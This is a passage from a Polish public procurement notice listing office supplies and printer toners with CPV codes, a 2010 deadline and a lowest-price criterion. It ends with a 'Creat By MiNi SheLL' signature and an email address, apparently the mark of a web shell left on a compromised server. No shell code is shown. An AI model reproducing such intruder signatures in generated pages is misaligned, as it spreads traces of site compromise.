39. Mechanizm skoroszytowy z metalowa blaszką, 4 dziurki - wąsy wykonane z ekologicznego PP pakowane po min. 25 szt. -  za 1 opakowanie.
40. Holdery z taśmą - (identyfikator osobisty) -  - za 1 sztukę,
41. Identyfikator wyposażony w samozaciskowy klips i agrafkę -  - za 1 sztukę,
42. Naboje do pióra wiecznego - Parker  z dużym zasobnikiem  - za 1 opakowanie,
43. Naboje do pióra wiecznego - Waterman   - za 1 opakowanie,
44. Klej w płynie z pędzelkiem , pojemność min. 50 ml   - za 1 sztukę,
45. Nożyczki biurowe wymiar 16 cm.  - za 1 sztukę,
46. Kredki pastelowe, drewniane o miękkim wkładzie 12 kolorowe - za 1 opakowanie,
47. Pojemnik na czasopisma wykonany z plastiku o wymiarach 210x320x255 mm - za 1 sztukę
48. Pisaki, różne kolorowy ścięta końcówka, grubość linii pisania minimum 2mm - za 1 opakowanie,
49. Pisak kreślarski grubość linii pisania 0,05 mm średnicy  - za 1 sztukę,
50. Spinacz archiwizacyjny biały plastikowy przeznaczony do błyskawicznego spinania dokumentów 50 sztuk w opakowaniu - za 1 opakowanie,
51.Temperówka z pojemnikiem  - za 1 sztukę,
52. Gumka do mazania - za 1 sztukę,
           53. Półki na dokumenty z plastiku  do formacie A4  - za 1 sztukę,
 	54.Papier kolorowy pastelowy 80G/m2 ryza 500 arkuszy  - za 1 ryzę,
           55.Papier kolorowy błyszczący szkolny - za 1 sztukę,
56.Bristol o wymiarach ok. 2mx2m   - za 1 sztukę
57. Pojemnik metalowy na spinacze - za 1 sztukę,
58. Kartoteka obrotowa na 500 kart wizytowych, metalowa - za 1 sztukę,
59. Wizytownik na 200 szt. wizytówek - za 1 sztukę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.76.20-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część VII B Dostawa materiałów eksploatacyjnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII B Dostawa materiałów eksploatacyjnych do wyceny ( za  1 szt.):

1.Kaseta z tonerem do kserokopiarki 
a) Toshiba 2060.
b) Toshiba 1350 E
2.Kaseta z tonerem do kserokopiarki - Sharp AR - M 160.
3.Kaseta z tonerem o symbolu 15 A do drukarki HP Laser Jet 1200. 
4.Kaseta z tonerem o symbolu13 A do drukarki HP Laser Jet 1300. 
5.Kaseta z tonerem o symbolu 12 A do drukarki HP Laser Jet 1010.
6.Kaseta z tonerem o symbolu 06 A do drukarki HP Laser Jet 6L. 
7.Kaseta z tonerem o symbolu 49 A do drukarki HP Laser Jet 1320.
8.Kaseta z tonerem o symbolu 36A do drukarki HP M1120
9.Kaseta z tuszem do drukarki HP Desk Jet- 1220 c.
a) tusz czarny o symbolu 45.
b) tusz kolorowy o symbolu 78.
10.Kaseta z tonerem do drukarki HP Laser Jet 1600 o symbolu:
a) Q6000A
b) Q6001A
c) Q6002A
d) Q6003A
11.Kaseta z tonerem o symbolu 92 A do drukarki HP Laser Jet 1100.
12.Kaseta z tonerem do drukarki Phaser 3435 XEROX 106R 01414 (D4)
13.Kaseta z tonerem o symbolu CB540 A
14.Kaseta z tonerem o symbolu CB541 A
15.Kaseta z tonerem o symbolu CB542 A
16.Kaseta z tonerem o symbolu CB443 A
17.Toner do kserokopiarki TOSHIBA 1340 o symbolu T-1350E
18.Toner do urządzenia wielofunkcyjnego XEROX WorkCentre 5016
19.tusz czarny o symbolu 338
20.tusz kolorowy o symbolu 343
21.Płyta CD  (klasy Verbatim) 700 MB (w kopertach - każda płyta musi być pakowana osobno, dopuszcza się pakowane w szpuli + koperta do każdej płyty).
22.Płyta DVD+R, (klasy Verbatim) (w kopertach - każda płyta musi być pakowana osobno,dopuszcza się pakowane w szpuli + koperta do każdej płyty).

1. W przypadku składania ofert na materiały eksploatacyjne Zamawiający wymaga aby zaoferowane materiały były: oryginalne, nieregenerowane, nieposiadające elementów z recyklingu.
2. W przypadku zaoferowania materiałów eksploatacyjnych równoważnych, Zamawiający zastrzega, aby produkty zamienne(wszystkie komponenty użyte do produkcji np. Tonerów równoważnych) były wyprodukowane przez danego producenta od podstaw a oferowane zamienniki posiadały wszystkie funkcje materiałów oryginalnych, np.  poziom tuszu.
3. W przypadku złożenia oferty równoważnej na materiały eksploatacyjne Wykonawca ma obowiązek dołączenia do oferty:
a) Oświadczenie Wykonawcy, że zaoferowane materiały eksploatacyjne są oryginalne, nieregenerowane i nie posiadają elementów z recyklingu. Oświadczenie musi zawierać zobowiązanie Wykonawcy do naprawy urządzenia w przypadku awarii spowodowanej zastosowaniem materiałów dostarczonych przez Wykonawcę.
b) deklaracji zgodności ( w języku polskim)  producenta materiałów równoważnych lub jego upoważnionego przedstawiciela na produkt równoważny stwierdzającej, że wyrób jest zgodny z zasadami i wymaganiami w rozumieniu art. 5 ust 16 ustawy z dnia 30 sierpnia 2002 o systemie oceny zgodności, Dz. U. Nr 204, poz. 2087 z 2004 r., tj. należy przez to rozumieć wymagania, które powinien spełniać wyrób wprowadzony do obrotu, określone w dyrektywach nowego podejścia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com